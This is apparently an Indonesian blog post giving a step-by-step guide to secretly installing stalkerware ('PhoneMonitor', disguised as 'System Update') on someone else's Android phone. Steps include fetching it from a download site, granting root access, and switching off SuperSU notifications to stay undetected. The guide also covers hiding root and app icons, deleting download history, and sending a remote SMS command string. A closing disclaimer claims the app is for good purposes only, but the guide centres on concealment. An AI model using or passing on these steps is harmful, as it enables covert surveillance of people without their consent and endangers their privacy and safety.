PANDUAN INSTAL ANDROID VERSI EXTREME & SADAP PHONE

PANDUAN INSTAL ANDROID VERSI EXTREME

Instalasi dan Aktivasi




Semua langkah ini dilakukan sepenuhnya pada perangkat target itu sendiriKami menggunakan Android versi 4.1.2 sebagai contohUntuk perangkat Sasaran berjalansebelumnya atau versi yang lebih barulangkah-langkah ini mungkin sedikit berbeda.

PENTINGUntuk mengaktifkan fitur yang paling canggih dari perangkat lunakperangkatSasaran Anda harus di rooting sebelum instalasiJika Anda  rooting perangkat target Andasetelah instal aplikasiAnda harus Nonaktifkan dan Uninstall perangkat lunak, kemudian instal ulang untuk memberikan izin SuperSU pada perangkat yg sdh rootingJika Anda tidak yakin apakah versi includes / fitur canggih yang dirootingsilakan cek dengan vendor Anda.

 1.    Buka browser Internet pada perangkat Target dan masukkan "http://dmw.cc/datau"http://dmw.cc". 

    
  Akan meminta untuk memilih platform perangkat. Silakan tekan "Android". Jika  tidakbertanya, perangkat lunak akan didownload secara otomatisSilakan pindah ke langkah 2.

    2. Pada bilah Pemberitahuan di bagian atas perangkatAnda akan melihat perangkat lunak sedang didownloadAnda dapat geser layar ke bawah untuk melihat proses download.Setelah  selesaitekan di atasnya untuk memilihnya.

     Jika perangkat diatur untuk memblokir instalasi aplikasi yang tidak diperoleh dariAndroid Market atau Play Store, pergi ke Android Menu -Settings -Security dan centang" Unknown source"Setelah selesaikembali ke Instalasi langkah 1 dan melanjutkan.
 
  3.   Untuk mulai instal tekan "Nextsampai Anda melihat "Install", kemudian tekan"Installuntuk melanjutkan.

     
4. Tekan "Open
     Jika layar pengaturan perangkat lunak menghilang pada tahap inipergi ke Device dan dial * # 900900900 sebagai panggilan untuk membawanya kembali ke foreground
 
    5 [Hanya untuk yang sudah dirooting] Tekan "Not Yetuntuk menonaktifkan Tampilkanpemberitahuan & Re-otentikasi 
SuperSU untuk tetap tidak terdeteksi
     Jika perangkat target Anda tidak rootingAnda tidak akan melihat langkah ini dan akan dipindahkan ke Langkah 13 secara otomatis.
 
    6. [
Hanya untuk yang sudah dirooting] Tekan  "OK, I got it. Open SuperSU"
 
  7.   [
Hanya untuk yang sudah dirooting] Di dalam SuperSUtekan "Setting", gulir ke bawah dan hapus centang kedua "Show notifications" and "Re-authentication"
 
   8.  [
Hanya untuk yang sudah dirootingSetelah centang "Show notifications" and "Re-authentication" di app SuperSUkembali ke layar Home, cari "PhoneMonitoricontekandi atasnya dan tekan "Yes"
 
    9. [
Hanya untuk yang sudah dirooting] Tap "Already Done / Sudah Selesaiuntuk instalasi pertama kali
     Jika Anda telah menginstal perangkat lunak pada perangkat ini sebelumnyaAnda mungkin perlu menekan "Launch Superuser", kemudian pergi ke "Appsdan mencari "PhoneMonitor". Setelah ditemukan, tekan di atasnya danketuk "Lupakan / forgettetap bijaksanaJika Anda tidak dapat menemukan "System Updateatau "PhoneMonitor", silakan pindah ke langkah berikutnya.
    10. [
Hanya untuk yang sudah dirooting] Tekan "Next".
 
    11.  [
Hanya untuk yang sudah dirooting] Tekan permintaan "GrantSuperuserPastikan"Ask again" adalah JANGAN DICENTANG.

     CATATAN: jika Anda tidak memberikan izin atau jika Anda keluar halaman inimaka Anda masih memiliki akses ke fitur standar.

 
   12  [
Hanya untuk yang sudah dirooting] Layar ini memberikan Anda kesempatan untukmenyembunyikan icon root, superuser atau SuperSU pada perangkat untuk membuatnya terlihat seolah-olah itu tidak pernah DirootingJika Anda ingin melakukannya, silahkan klik YesPada tahap iniperangkat lunak akan mengkonfigurasi dan mungkin memakan waktu hingga beberapa menit untuk menyelesaikanHarap jangan tekan atau tekan tombol apapun di telepon.

     CATATANSuperuser atau ikon SuperSU dapat dibawa kembali kapan saja dengan menggunakan perintah remoteHubungi vendor Anda untuk detail.
 
  
13.   Layar ini akan menginformasikan modus perangkat lunak ini berjalan di atasperangkat. Dalam hal iniperangkat telah berakar dan perangkat lunak dapat mendapatkan akses SuperSU penuh di atasnya, sehingga perangkat lunak berjalan dalam modeFULL.Tekan "Restart Now".
 

     Jika Anda melihat layar ini, berarti perangkat tersebut tidak dapat sepenuhnyamemberikan superuser Permintaan (langkah 11) meskipun mungkin telah rootingSilahkan klik "Try again", restart perangkat dan Anda akan melihat "PhoneMonitorikon pada layar perangkatKetuk pada ikon dan kembali ke Instalasi langkah 5 untuk memberikan superuserPermintaan sekali lagiJika masih gagalketuk "Gunakan Limited 1dan restart perangkat.Instalasi akan lengkap.

     Jika Anda melihat "Running dalam mode Normalpada layar, berarti perangkatbelumdirooting atau superuser Permintaan (langkah 11) tidak sepenuhnya diberikanDalam hal perangkat rootingpastikan SIM Card atau layanan telepon tersedia, kemudian menghapus "PhoneMonitordari Application Manager, restart perangkat dan mulai Instalasidari langkah 1 untuk mencoba lagiAnda juga dapat terus menginstal perangkat lunakdalam mode Normal tapi fitur tertentu mungkin tidak bekerjaUntuk informasi lebih lanjuttentang modus berjalan, silakan hubungi vendor Anda.

   14.  Setelah restart perangkatpergi ke Home dan tekan * # 900900900 tekan call / panggil untuk membawa layar aktivasi hingga foregroundMasukkan kode aktivasi Anda:xxx dan tekan "Aktifkan"
 
    15. Tunggu sampai aktivasi selesai.

 16.    Segera setelah Anda melihat "
Nice! Activation success"perangkat lunak diaktifkan dan siap untuk digunakanAnda akan diminta untuk memilih apakah Anda ingin perangkat lunak yang akan terlihat di teleponJika Anda memilih "Yes", pengguna telepon akan melihat "PhoneMonitor" ikon di layarJika Anda memilih "No", perangkat lunak akantersembunyiHal ini tidak akan mempengaruhi fungsi perangkat lunak dengan cara apapun. kami sarankan untuk memilih "No" 
    
 Jika Anda memilih untuk menyimpan perangkat lunak terlihat dan anda menekan"PhoneMonitor" iconAnda akan melihat di bawah layar.


Setelah selesaikembali ke layar Home utama untuk keluar dari program antarmuka.
  
PENTINGUntuk tetap bijaksana, ikuti langkah selanjutnya untuk menghapus semua riwayat download.

Setelah proses instalasi silahkan lanjutkan ke proses konfigurasi web disini 

CARA MENGHAPUS APLIKASI DARI HP ANDROID 

Sebelum hapus aplikasi dan nonaktifkan aplikasi, lakukan penyimpanan data dulu , panduannya disini
agar data tersimpan 

Untuk Android Mobile Phone / Tablet dengan Sim Card

1. Nonaktifkan dulu

     Login ke dashboard Andapergi ke 
Control Center-> Device Controls-> Deactivate
     Untuk memverifikasilalu masuk ke acount dan gulir ke bawah untuk Lisensi Profil untuk melihat status account AndaLisensi Tombol diaktifkan muncul di bawah "Active" tab menu, sedangkan acount yang tidak aktif atau telah deactive akan muncul di bawah "inactive" tabmenu.

2. Uninstall kemudian

     Software berjalan dalam mode Normal

     Pergi ke pilihan Pengaturan pada perangkat Target, kemudian pergi ke ApplicationManager, cari "System Update / phone monitor", tekan di atasnya dan tekan "Uninstall".Setelah selesairestart perangkat untuk menyelesaikan pencopotan.
     Software berjalan di Terbatas 1 dan mode penuh
         Gunakan perangkat Monitor atau perangkat mobile / hp untuk mengirim perintah SMSyang berisi teks ini persis ke nomor telepon TARGET.
         <# 200<D>
         Jika perangkat Sasaran Android Anda menjalankan Android versi OS 4.4.xperintahSMS Anda dapat terlihat pada setelah diterimaPastikan hp target di tangan anda untukmenghapus pesan perintah dalam kotak masuk.

Untuk Tablet Android tanpa Sim Card

1. Uninstall

     Login ke dashboard Andapergi ke 
 Control Center-> Device Controls-> Uninstall

2. Kemudian Nonaktifkan

     Login ke dashboard Andapergi ke 
Control Center-> Device Controls-> Deactivate
     Untuk memverifikasilalu masuk ke Akun dan gulir ke bawah untuk Lisensi Profil untuk melihat status account AndaLisensi Tombol diaktifkan muncul di bawah "Active" tab menu, sedangkan acount yang tidak aktif atau telah dinonaktifkan akan muncul di bawah"inactive" tab menu.

PERHATIAN : 
Aplikasi phone monitor ini hanya untuk tujuan baik, untuk mengawasi anak maupun karyawan yang sudah diketahui oleh mereka, untuk penggunaan yang melanggar hukum TEAM DESTROYERD berlepas tangan

Komentar

Postingan Populer